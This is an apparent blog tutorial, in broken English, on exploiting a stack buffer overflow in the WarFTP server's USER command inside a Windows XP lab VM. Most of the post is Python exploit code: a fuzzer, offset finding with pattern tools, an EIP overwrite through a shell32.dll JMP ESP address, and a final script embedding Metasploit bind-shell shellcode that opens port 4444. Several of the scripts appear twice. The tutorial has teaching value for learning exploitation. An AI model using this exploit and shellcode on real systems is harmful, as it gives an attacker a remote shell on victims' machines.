In this
time, I will try to exploit an application by using a fuzzing method.
I have explained about fuzzing in my previous article. Ok now, an
Application that I want to exploit is WARFTP. In this
session, I use some tools like :
- Ollydbg in my Windows XP on Virtual Box.
- NC
- Metasploit Framework
- WarFTP server
- Pattern Create
- Pattern Offset
First,
I make a simple fuzzer which use to send the data in potocol of FTP.
This fuzzer script was made by using a Python Language. The script
was like this:
#!/usr/bin/python
import
socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buffer="\x41"*1000
s.connect(('192.168.56.101',21))
data=s.recv(1024)
print("sending
evil data via USER command..")
s.send('USER
'+buffer+'\r\n')
data=s.recv(1024)
s.send('PASS
PASSWORD '+'\r\n')
s.close()
print("Finish")
I
was gave a name xfuzz.py to that file. Next, I open the WarFTP
in my Windows XP in my Virtual Box and I Start the Service of WarFTP.
Then the status of WarFTP will be IDLE. Then, I try to connect ftp from
my Backtrack by using NC. I typed a command nc 192.168.56.101
21 . If that was connected, the it will appear a notice like
this:
Next,
I start the xfuzz.py file that I have made before to see what
happen with Warftp by using a command python xfuzz.py And
Wow.. The warFtp is CRASH. I try to open the WarFTP again but it
appear a message error like this.
That's because a user configuration
which made by WarFTP was crash when fuzzer try to send data by USER
command. A configuration was saved in FtpDAemon.Dat file. So, I
delete the FtpDaemon.DAT file and I try to open the WarFTP again. And
it's work. I make a new user from button User Security Properties. I make user yuza.
Next, i start the WarFTP server from OllyDbg
Then,i running again a fuzzer that i've made before in my Backtrack system, and see what happen to WarFTP and Ollydgb.
From the result below, there are 4 register on WarFTP crushed with data that send by using fuzzer. That was ESP, EBP, EDI, EIP. The fourth register crushed with the value 0x41 or if change to ASCII will be a letter A
Next, in my Backtrack console i entry to the directory /pentest/exploits/framework/tools/ by using a command cd /pentest/exploits/framework/tools/ . Then i typed a command ./pattern_create.rb 1000 > string_pattern.txt to make a 1000 byte of data. Then the data in string_pattern.txt will be like this
Next step, i copy that data to the script fuzzer that i've made. The script will be like this :
#!/usr/bin/python
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buffer = " Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"
#buffer="\x41"*1000
s.connect(('192.168.56.101',21))
data=s.recv(1024)
print("sendingevildatavia USER command..")
s.send('USER '+buffer+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")
Then i repeat the fuzzer again with command python xfuzz.py . and i got the result on register memory of WarFTP is like this
Ok, after that i use an application pattern offset to count the amount of bytes from the patterns that made by pattern_create.rb. i'll go to the direcory pentest/exploits/framework/tools/ in my Backtrack console. I typed a command ./pattern_offset.rb 32714131 and then ./pattern_offset.rb q4Aq5Aq and the result is like this
From the result above, i know to achieved the EIP register, so i need 485 byte data and to achieved the stack, i need 493 byte data. Next, i change the script fuzzer again to add the variabel EIP value inside. I try to change the value in EIP to be a letter DEADBEEF by using a little-endian script. The script that i have change is like this:
#!/usr/bin/python
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
nilaiEIP = "\x90" * 485
nilaiEIP+= "\xEF\xBE\xAD\xDE"
s.connect(('192.168.56.101',21))
data=s.recv(1024)
print("sending evil data via USER command..")
s.send('USER '+nilaiEIP+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")
After that, i start the WarFTP again from the OllyDbg and start the fuzzer again. And the result is like this. I've succees to change the register EIP.
Next step i try to write in ESP because ESP was a place to storage the temporary data inside the memory(stack). If the stack succeed, then it is possible to put the payload inside the stack. Then, i change again the fuzzer script to be like this.
#!/usr/bin/python
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buffer = "\x90" * 485
buffer+= "\xEF\xBE\xAD\xDE"
buffer+= "\x90" * (493-len(buffer))
buffer+= "\xCC" * (1000 - len(buffer))
s.connect(('192.168.56.101',21))
data=s.recv(1024)
print("sending evil data via USER command..")
s.send('USER '+buffer+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buffer = "\x90" * 485
buffer+= "\xEF\xBE\xAD\xDE"
buffer+= "\x90" * (493-len(buffer))
buffer+= "\xCC" * (1000 - len(buffer))
s.connect(('192.168.56.101',21))
data=s.recv(1024)
print("sending evil data via USER command..")
s.send('USER '+buffer+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")
Then i run the WarFTP again from Ollydbg and then i run the fuzzer again. In the window Register and Stack is appear like this
After that, i try to look the list of Library that used by an application WarFTP. I clicked the View Menu in Ollydbg and i click again the menu Executable Modules.
From the list of library above, i choose SHELL32.dll to use it to entry inside the stack. Then i click on shell32.dll and then appear a window like this
After that i search a command JMP ESP inside that file. Command JSP EMP is a command that used to application to read the data which located inside the buffer, so that the value from register EIP will move to the inside an address memory where inside it has been saved command JSP EMP. A simple procces is like this Register EIP -> an address memory that located the JMP ESP command -> Register ESP -> Buffer (Stack) -> payload execution. In the main window i click Right button on Mouse -> Search For -> Command and then i typed JMP ESP on it.
And then i found like this,
To choosing an address memory which will be use to exploit, that address should not contain the value \x00, \x0a and \x0d. The third address can broken the payload code that will sended to the buffer(stack) memory. In my case, an address that appear is 7C9D30D7 FFE4 JMP ESP
Next step, i change the fuzzer script again to give a command to the fuzzer application to change the value of register EIP to be an address from JMP ESP which located inside the shell32.dll file. The 7C9D30D7 i change to little-endian format to be \xD7\x30\x9D\x7C . The script is changed to be like this
#!/usr/bin/python
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buffer = "\x90" * 485
buffer+= "\xD7\x30\x9D\x7C"
buffer+= "\x90" * (493-len(buffer))
buffer+= "\xCC" * (1000 - len(buffer))
s.connect(('192.168.56.101',21))
data=s.recv(1024)
print("sending evil data via USER command..")
s.send('USER '+buffer+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buffer = "\x90" * 485
buffer+= "\xD7\x30\x9D\x7C"
buffer+= "\x90" * (493-len(buffer))
buffer+= "\xCC" * (1000 - len(buffer))
s.connect(('192.168.56.101',21))
data=s.recv(1024)
print("sending evil data via USER command..")
s.send('USER '+buffer+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")
After that i run the WarFTP again by using OllyDbg and i run the fuzzer script above. And then the result is like this
Next step, i use Metasploit Framework to generate the Payload. I use the Metasploit Web Based to it.
Then i choose the Windows Shell Bind Payload and i generate it.
From the result of the generate payload above. I copy it to the script fuzzer.
#!/usr/bin/python
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buffer ="\x90" * 485
buffer+="\xD7\x30\x9D\x7C"
buffer+="\x90" * 31
buffer+="\x29\xc9\xda\xc2\xb1\x51\xbf\x79\x36\x4e\x14\xd9\x74\x24\xf4\x5e"
buffer+="\x83\xee\xfc\x31\x7e\x11\x03\x07\x27\xac\xe1\x0b\x2d\xdb\x47\x1b"
buffer+="\x4b\xe4\xa7\x24\xcc\x90\x34\xfe\x29\x2c\x81\xc2\xba\x4e\x0f\x42"
buffer+="\xbc\x41\x84\xfd\xa6\x16\xc4\x21\xd6\xc3\xb2\xaa\xec\x98\x44\x42"
buffer+="\x3d\x5f\xdf\x36\xba\x9f\x94\x41\x02\xd5\x58\x4c\x46\x01\x96\x75"
buffer+="\x12\xf2\x7f\xfc\x7f\x71\x20\xda\x7e\x6d\xb9\xa9\x8d\x3a\xcd\xf2"
buffer+="\x91\xbd\x3a\x0f\x86\x36\x35\x63\xf2\x54\x27\xb8\xcb\xbf\xc3\xb5"
buffer+="\x6f\x70\x87\x89\x63\xfb\xe7\x15\xd1\x70\x47\x2d\x77\xef\xc6\x63"
buffer+="\x89\x03\x86\x84\x43\xbd\x74\x1c\x04\x71\x49\x88\xa3\x06\x9f\x17"
buffer+="\x18\x16\x0f\xcf\x6b\x05\x4c\x34\x3c\x29\x7b\x15\x35\x30\xe2\x28"
buffer+="\xa8\xb3\xe9\x7f\x59\xc6\x12\xaf\xf5\x1f\xe5\xba\xab\xf7\x09\x92"
buffer+="\xe7\xa4\xa6\x49\x5b\x08\x1a\x2e\x08\x71\x4c\xd6\xc6\x9c\x31\x70"
buffer+="\x44\x16\x28\xe9\x02\x8c\xb1\x61\x14\x9b\x3a\x57\xf0\x34\x94\x02"
buffer+="\xfa\xe5\x7e\x08\xa9\x28\x96\x07\x4d\xe2\x3b\xf2\x4e\xdb\xd4\x19"
buffer+="\xf9\x5a\x6d\xb6\x05\xb4\x3e\x6c\xae\x6c\x40\x5c\xdd\xe7\x59\x25"
buffer+="\x24\x8e\xf2\x2a\x7e\x24\x02\x04\x19\xad\x98\xc2\x8e\x52\x0c\x83"
buffer+="\xaa\xff\x9e\xca\x1d\xcc\x96\x0b\x37\x88\x21\x31\xf9\xd0\xc1\x1f"
buffer+="\x04\x92\x08\xa1\xbb\x3f\xc0\xd0\x46\x78\x4d\x41\x1d\x10\xe3\x6b"
buffer+="\xd1\xf7\xfc\xe6\x52\x07\xd4\x53\x0c\xa5\x88\x32\xe3\x23\x2a\xe5"
buffer+="\x52\xe1\x7d\xfa\x85\x61\xd3\xdd\x23\xbc\x78\x22\xfd\x2a\x80\x23"
buffer+="\x35\x54\xae\x50\x6d\x56\xcc\xa2\xf6\x59\x05\x78\x08\x75\xc2\x02"
buffer+="\x2e\x94\x60\xa9\x31\x8f\x78\x9d"
s.connect(('192.168.56.101',21))
data=s.recv(1024)
print("sending evil data via USER command..")
s.send('USER '+buffer+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buffer ="\x90" * 485
buffer+="\xD7\x30\x9D\x7C"
buffer+="\x90" * 31
buffer+="\x29\xc9\xda\xc2\xb1\x51\xbf\x79\x36\x4e\x14\xd9\x74\x24\xf4\x5e"
buffer+="\x83\xee\xfc\x31\x7e\x11\x03\x07\x27\xac\xe1\x0b\x2d\xdb\x47\x1b"
buffer+="\x4b\xe4\xa7\x24\xcc\x90\x34\xfe\x29\x2c\x81\xc2\xba\x4e\x0f\x42"
buffer+="\xbc\x41\x84\xfd\xa6\x16\xc4\x21\xd6\xc3\xb2\xaa\xec\x98\x44\x42"
buffer+="\x3d\x5f\xdf\x36\xba\x9f\x94\x41\x02\xd5\x58\x4c\x46\x01\x96\x75"
buffer+="\x12\xf2\x7f\xfc\x7f\x71\x20\xda\x7e\x6d\xb9\xa9\x8d\x3a\xcd\xf2"
buffer+="\x91\xbd\x3a\x0f\x86\x36\x35\x63\xf2\x54\x27\xb8\xcb\xbf\xc3\xb5"
buffer+="\x6f\x70\x87\x89\x63\xfb\xe7\x15\xd1\x70\x47\x2d\x77\xef\xc6\x63"
buffer+="\x89\x03\x86\x84\x43\xbd\x74\x1c\x04\x71\x49\x88\xa3\x06\x9f\x17"
buffer+="\x18\x16\x0f\xcf\x6b\x05\x4c\x34\x3c\x29\x7b\x15\x35\x30\xe2\x28"
buffer+="\xa8\xb3\xe9\x7f\x59\xc6\x12\xaf\xf5\x1f\xe5\xba\xab\xf7\x09\x92"
buffer+="\xe7\xa4\xa6\x49\x5b\x08\x1a\x2e\x08\x71\x4c\xd6\xc6\x9c\x31\x70"
buffer+="\x44\x16\x28\xe9\x02\x8c\xb1\x61\x14\x9b\x3a\x57\xf0\x34\x94\x02"
buffer+="\xfa\xe5\x7e\x08\xa9\x28\x96\x07\x4d\xe2\x3b\xf2\x4e\xdb\xd4\x19"
buffer+="\xf9\x5a\x6d\xb6\x05\xb4\x3e\x6c\xae\x6c\x40\x5c\xdd\xe7\x59\x25"
buffer+="\x24\x8e\xf2\x2a\x7e\x24\x02\x04\x19\xad\x98\xc2\x8e\x52\x0c\x83"
buffer+="\xaa\xff\x9e\xca\x1d\xcc\x96\x0b\x37\x88\x21\x31\xf9\xd0\xc1\x1f"
buffer+="\x04\x92\x08\xa1\xbb\x3f\xc0\xd0\x46\x78\x4d\x41\x1d\x10\xe3\x6b"
buffer+="\xd1\xf7\xfc\xe6\x52\x07\xd4\x53\x0c\xa5\x88\x32\xe3\x23\x2a\xe5"
buffer+="\x52\xe1\x7d\xfa\x85\x61\xd3\xdd\x23\xbc\x78\x22\xfd\x2a\x80\x23"
buffer+="\x35\x54\xae\x50\x6d\x56\xcc\xa2\xf6\x59\x05\x78\x08\x75\xc2\x02"
buffer+="\x2e\x94\x60\xa9\x31\x8f\x78\x9d"
s.connect(('192.168.56.101',21))
data=s.recv(1024)
print("sending evil data via USER command..")
s.send('USER '+buffer+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")
Then i run WarFTP server directly without Ollydbg and i try to run the fuzzer again andd Booooom.. The WarFtp server was crash.
Then i run a telnet with a command telnet 192.168.56.101 4444 and i got the result like this
Well, i've succes to exploit it. :D
No comments:
Post a Comment